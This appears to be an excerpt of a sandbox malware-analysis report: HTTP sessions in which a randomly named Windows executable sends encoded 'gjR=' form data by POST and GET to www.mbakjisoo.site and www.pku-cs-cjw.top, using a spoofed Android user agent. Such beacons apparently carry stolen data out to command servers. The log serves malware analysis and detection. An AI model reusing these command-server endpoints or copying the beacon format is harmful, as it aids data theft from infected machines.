                                              Jan 10, 2025 18:04:45.239418983 CET1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Fri, 10 Jan 2025 17:04:45 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549981172.96.187.60802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:47.177798033 CET1854OUTPOST /s7cs/ HTTP/1.1
                                              Host: www.mbakjisoo.site
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.mbakjisoo.site
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 1240
                                              Referer: http://www.mbakjisoo.site/s7cs/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 53 57 73 52 51 51 48 72 6b 46 4e 2b 33 6c 35 57 63 6e 55 4c 53 62 6a 75 33 53 48 53 74 73 38 39 38 79 51 4d 45 4e 6c 32 67 76 4a 2b 75 77 77 4a 74 55 67 70 32 65 5a 6e 51 4d 6e 37 4f 67 41 61 4b 4a 56 5a 36 39 6e 76 48 73 42 2b 31 53 6e 48 2f 64 59 64 6d 2f 51 64 5a 67 51 54 7a 54 4f 33 79 54 50 52 52 75 57 57 4b 66 2f 76 68 63 47 4b 4b 59 4c 4d 61 68 76 61 73 65 74 6c 4c 4a 6e 73 49 54 30 78 58 75 62 53 46 44 34 63 39 41 33 68 5a 4d 78 6d 69 2b 39 4d 6c 42 71 4c 57 6a 46 74 51 4d 65 50 45 75 46 63 42 64 4a 6a 34 48 75 61 76 4e 51 6e 34 6c 75 7a 4d 77 67 43 74 47 69 42 2b 31 6c 72 4b 78 6c 7a 30 53 38 4c 59 38 46 35 72 66 61 49 74 63 43 62 66 4b 76 70 6d 79 35 74 78 62 36 4d 6d 6c 31 33 6c 70 46 65 53 6f 68 76 5a 5a 76 59 62 6e 72 72 43 39 35 35 68 45 2f 71 4e 74 4e 58 73 67 64 6e 36 72 71 47 79 4f 64 64 52 74 41 55 72 4b 54 50 57 38 32 30 31 35 6a 64 68 4a 75 47 33 2f 73 70 58 4f 58 44 34 6a 70 34 33 65 45 46 64 77 38 62 4b 6d 78 61 2b 58 67 43 4e 62 [TRUNCATED]
                                              Data Ascii: gjR=aDmdZf0q1uw1SWsRQQHrkFN+3l5WcnULSbju3SHSts898yQMENl2gvJ+uwwJtUgp2eZnQMn7OgAaKJVZ69nvHsB+1SnH/dYdm/QdZgQTzTO3yTPRRuWWKf/vhcGKKYLMahvasetlLJnsIT0xXubSFD4c9A3hZMxmi+9MlBqLWjFtQMePEuFcBdJj4HuavNQn4luzMwgCtGiB+1lrKxlz0S8LY8F5rfaItcCbfKvpmy5txb6Mml13lpFeSohvZZvYbnrrC955hE/qNtNXsgdn6rqGyOddRtAUrKTPW82015jdhJuG3/spXOXD4jp43eEFdw8bKmxa+XgCNbKn/J98tTYDla2roKjqq8FodnEWto4op1yLS7fjx4rOdfDplLWg4ypU8oZWOizi/16Rv5TmQYv5mDm8sEayQCmxyFRrFfg0iLAFdissN5yZFQLvSDRAhVMAbrPHifs1yyfgUm55mZDUMRG6X8uDyqR8RVJtymeY/lsP3OmrJA2/CfY3TCOTFE69K1h4ziS54t22YB6raY32T3nayIbYex6YZo8BnOwJ8XR1QC4jQzFavy5oI14iUo4+yg/uOwfszUQRuYFmDdNfm7wLXD796sktEpTR+NxaukBxS3WG2cQOA5DGSm/OSkN+6h15cUxzwaaffc47vnvA0YbP1fWDtvnLIILTSkF85LQCIljapcN7mWY8j6yqiUKrUUYb1D7azrG2k5HHcYmjUIwFL/CN0heY9MmKkuPRc6/CGIXRPHjNVU9jP/mKEkot33uN+/jwwF13VZv5Ay8zwMBIVAWFzFrz3ZDJvrACXxZqF2bjJ5R/JRx5AabHbAN9XrYRRtLRGCoG1U1iA4jWBYOkgc07sw32DQnQSiFQmcuiqK2B4ZkCf4W/a6muM63xZ+R/ZjXhEVhB6ExTizKC/sg8PbNHD/nfWqKqa3urhZg1+KXcYfkiZ2SVaZLSmNEljyI/peJ/1GR6im1TZC4+7fan0fsDVXRGMT5E8EVxYUDB [TRUNCATED]
                                              Jan 10, 2025 18:04:47.652982950 CET1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Fri, 10 Jan 2025 17:04:47 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549982172.96.187.60802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:49.720448971 CET550OUTGET /s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn HTTP/1.1
                                              Host: www.mbakjisoo.site
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Jan 10, 2025 18:04:50.155373096 CET1033INHTTP/1.1 404 Not Found
                                              Connection: close
                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                              pragma: no-cache
                                              content-type: text/html
                                              content-length: 796
                                              date: Fri, 10 Jan 2025 17:04:50 GMT
                                              server: LiteSpeed
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.549983185.199.108.153802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:55.987482071 CET817OUTPOST /o8v1/ HTTP/1.1
                                              Host: www.pku-cs-cjw.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.pku-cs-cjw.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 204
                                              Referer: http://www.pku-cs-cjw.top/o8v1/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 58 44 70 51 38 6e 49 50 78 35 55 43 48 4b 79 46 37 67 79 52 57 44 59 35 32 31 46 47 58 44 61 6a 56 52 37 69 42 73 72 6c 73 61 78 30 42 2b 79 6f 78 76 64 38 36 7a 73 6f 4f 55 66 48 76 79 66 79 49 75 71 78 67 35 76 59 52 75 76 31 7a 72 39 74 79 73 7a 52 76 33 79 38 30 30 4c 39 4d 43 59 6b 55 4b 59 41 67 2b 78 4c 44 35 4b 55 61 46 69 6f 55 44 63 41 37 61 65 67 4d 32 44 77 58 5a 6e 33 31 56 32 41 49 76 53 31 6b 31 6f 66 4f 42 55 73 31 63 38 55 49 62 49 7a 67 42 68 56 50 6e 65 2b 6b 48 36 2f 75 6e 6d 62 44 7a 2b 67 63 2f 6d 65 74 67 70 68 6d 54 6d 64 68 5a 50 6b 49 63 74 51 53 35 49 65 38 35 38 3d
                                              Data Ascii: gjR=XDpQ8nIPx5UCHKyF7gyRWDY521FGXDajVR7iBsrlsax0B+yoxvd86zsoOUfHvyfyIuqxg5vYRuv1zr9tyszRv3y800L9MCYkUKYAg+xLD5KUaFioUDcA7aegM2DwXZn31V2AIvS1k1ofOBUs1c8UIbIzgBhVPne+kH6/unmbDz+gc/metgphmTmdhZPkIctQS5Ie858=
                                              Jan 10, 2025 18:04:56.433792114 CET488INHTTP/1.1 405 Method Not Allowed
                                              Connection: close
                                              Content-Length: 131
                                              Server: Varnish
                                              Retry-After: 0
                                              Accept-Ranges: bytes
                                              Date: Fri, 10 Jan 2025 17:04:56 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-ewr-kewr1740039-EWR
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1736528696.388390,VS0,VE0
                                              X-Fastly-Request-ID: 3f578f8748d41f8871147b93357460133418d537
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.549984185.199.108.153802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:04:58.536694050 CET837OUTPOST /o8v1/ HTTP/1.1
                                              Host: www.pku-cs-cjw.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.pku-cs-cjw.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 224
                                              Referer: http://www.pku-cs-cjw.top/o8v1/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 58 44 70 51 38 6e 49 50 78 35 55 43 56 2b 32 46 35 47 36 52 51 6a 5a 4c 7a 31 46 47 63 6a 61 76 56 52 48 69 42 74 76 31 74 73 70 30 42 65 43 6f 2b 4f 64 38 37 7a 73 6f 57 45 66 43 73 43 66 44 49 76 57 66 67 39 76 59 52 75 72 31 7a 70 31 74 79 66 61 6a 73 48 79 2b 74 6b 4c 7a 54 53 59 6b 55 4b 59 41 67 2b 6c 74 44 35 53 55 61 55 79 6f 4f 68 30 50 36 61 65 76 61 6d 44 77 54 5a 6e 7a 31 56 33 6c 49 75 50 39 6b 33 67 66 4f 45 6f 73 32 4a 63 54 44 62 49 31 2b 78 67 33 44 55 43 7a 71 31 71 58 74 48 6a 6f 59 6a 75 6f 51 70 58 30 33 43 68 4a 31 7a 4b 6c 78 4b 48 54 5a 73 4d 35 49 61 59 75 69 75 6f 43 77 79 78 79 43 32 31 4b 4c 5a 6b 75 5a 77 56 69 69 70 50 71
                                              Data Ascii: gjR=XDpQ8nIPx5UCV+2F5G6RQjZLz1FGcjavVRHiBtv1tsp0BeCo+Od87zsoWEfCsCfDIvWfg9vYRur1zp1tyfajsHy+tkLzTSYkUKYAg+ltD5SUaUyoOh0P6aevamDwTZnz1V3lIuP9k3gfOEos2JcTDbI1+xg3DUCzq1qXtHjoYjuoQpX03ChJ1zKlxKHTZsM5IaYuiuoCwyxyC21KLZkuZwViipPq
                                              Jan 10, 2025 18:04:58.975395918 CET488INHTTP/1.1 405 Method Not Allowed
                                              Connection: close
                                              Content-Length: 131
                                              Server: Varnish
                                              Retry-After: 0
                                              Accept-Ranges: bytes
                                              Date: Fri, 10 Jan 2025 17:04:58 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-nyc-kteb1890094-NYC
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1736528699.931605,VS0,VE0
                                              X-Fastly-Request-ID: d5756037b59af24ec5ad8b8fb1e1ca9a164e470a
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.549985185.199.108.153802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:05:01.083332062 CET1854OUTPOST /o8v1/ HTTP/1.1
                                              Host: www.pku-cs-cjw.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Origin: http://www.pku-cs-cjw.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Content-Length: 1240
                                              Referer: http://www.pku-cs-cjw.top/o8v1/
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Data Raw: 67 6a 52 3d 58 44 70 51 38 6e 49 50 78 35 55 43 56 2b 32 46 35 47 36 52 51 6a 5a 4c 7a 31 46 47 63 6a 61 76 56 52 48 69 42 74 76 31 74 73 68 30 42 76 69 6f 78 4a 4a 38 71 44 73 6f 66 6b 66 44 73 43 66 6b 49 75 2b 54 67 39 69 6c 52 74 66 31 68 63 35 74 30 75 61 6a 33 33 79 2b 77 30 4c 79 4d 43 5a 38 55 4b 49 45 67 39 64 74 44 35 53 55 61 57 61 6f 41 6a 63 50 34 61 65 67 4d 32 44 30 58 5a 6e 58 31 52 62 54 49 75 61 66 6c 47 41 66 4f 6b 59 73 30 36 30 54 41 37 49 33 2f 78 67 52 44 55 50 7a 71 31 32 39 74 45 2f 43 59 68 4f 6f 56 59 6d 39 6b 68 35 77 70 41 65 35 2b 4c 65 32 46 4c 38 31 4f 5a 67 45 68 74 63 67 7a 32 31 79 45 69 52 49 45 59 64 6e 48 48 42 35 69 65 71 71 74 65 4d 65 6c 39 4b 66 4e 65 7a 69 6e 64 45 79 6f 30 39 72 67 69 64 2b 73 6b 51 32 44 36 59 35 51 50 33 6d 79 51 74 37 62 70 6d 52 74 50 7a 32 53 6d 70 67 2f 70 48 72 64 65 63 36 53 68 46 37 63 72 2f 6f 42 64 78 37 62 74 53 35 34 2b 4f 53 50 49 6b 52 48 31 48 73 33 74 58 34 56 4b 4f 52 4b 44 59 4f 64 61 4a 38 46 36 6e 58 54 47 73 53 2f 79 [TRUNCATED]
                                              Data Ascii: gjR=XDpQ8nIPx5UCV+2F5G6RQjZLz1FGcjavVRHiBtv1tsh0BvioxJJ8qDsofkfDsCfkIu+Tg9ilRtf1hc5t0uaj33y+w0LyMCZ8UKIEg9dtD5SUaWaoAjcP4aegM2D0XZnX1RbTIuaflGAfOkYs060TA7I3/xgRDUPzq129tE/CYhOoVYm9kh5wpAe5+Le2FL81OZgEhtcgz21yEiRIEYdnHHB5ieqqteMel9KfNezindEyo09rgid+skQ2D6Y5QP3myQt7bpmRtPz2Smpg/pHrdec6ShF7cr/oBdx7btS54+OSPIkRH1Hs3tX4VKORKDYOdaJ8F6nXTGsS/yi1bn9TpTKKQj1DNqqK8HhdSBJ61N098chlORgMaAOqt/bK+h6y9PO6mkj84oFCa0qDqGDyJ6AgnS4Ko6AaT/mEnxzvG5swqJAga51GjYwbcJ1Od794oS17WNOGqh8vPyN1L5OweRW3/RojpE8msLNDfHa84EGZdKXaQcYx6DC4fVTannwKoT2fXRaZLq1LQfWS4Fc+lkgwOx4s8+Ly7ipIv3zUVgkR/t6OIF4NTXcCkZmOgvtp/S/yFLwQTz5+HrWJlHjie/vV/nqz4ZWxy+0lwe9MxJ/e7E+ppFnaYu49QDD2gEHTxeTgId1Zvh1DOtf8oKGb11vosY/rz8EiJefocXUYDBqpsg2h0FoyxYvbJ9RIfXDU2qQaZiUqpIMLIBhKG0yixhTOtm6vJZ83sLsuI8OmCEhMQuqIoxVapmQgdbjpAJtEQyFuYWchctn+FS1vGSs17LYMSkjU1Hi8r5rsEUybY2AQnUXWsepUtS30JHoZ8oqgFZnYFi7zophUGqrqTa3e9ovwE0r0p4Q8FLsbNds75SDwccM2lW/+LSvM+GF3Ezwi/51bE3Dtr+eZlJng/FzNG0lGXgOm0cENQqva3fyx3L1XMcDCEh/aer615HqscVC+wbgC/PA5eYobjCxBLIhwLAw9lNtEfdILA5qSY2gj5u7Omohf [TRUNCATED]
                                              Jan 10, 2025 18:05:01.540545940 CET488INHTTP/1.1 405 Method Not Allowed
                                              Connection: close
                                              Content-Length: 131
                                              Server: Varnish
                                              Retry-After: 0
                                              Accept-Ranges: bytes
                                              Date: Fri, 10 Jan 2025 17:05:01 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-ewr-kewr1740041-EWR
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1736528701.493160,VS0,VE0
                                              X-Fastly-Request-ID: 57dbb5841e441b94ee97274ee510fccdae437873
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.549986185.199.108.153802764C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 18:05:03.629528999 CET550OUTGET /o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn HTTP/1.1
                                              Host: www.pku-cs-cjw.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                              Jan 10, 2025 18:05:04.096872091 CET805INHTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              Content-Length: 162
                                              Server: GitHub.com
                                              Content-Type: text/html
                                              X-GitHub-Request-Id: 2444:264E2D:D980F0:EA6A31:6781533F
                                              Accept-Ranges: bytes
                                              Age: 0
                                              Date: Fri, 10 Jan 2025 17:05:04 GMT
                                              Via: 1.1 varnish
                                              X-Served-By: cache-ewr-kewr1740038-EWR
                                              X-Cache: MISS
                                              X-Cache-Hits: 0
                                              X-Timer: S1736528704.040004,VS0,VE10
                                              Vary: Accept-Encoding
                                              X-Fastly-Request-ID: 798c82793db5df2cceabfba5a3e97f9193be3bc5
                                              Location: http://pku-cs-cjw.top/o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn
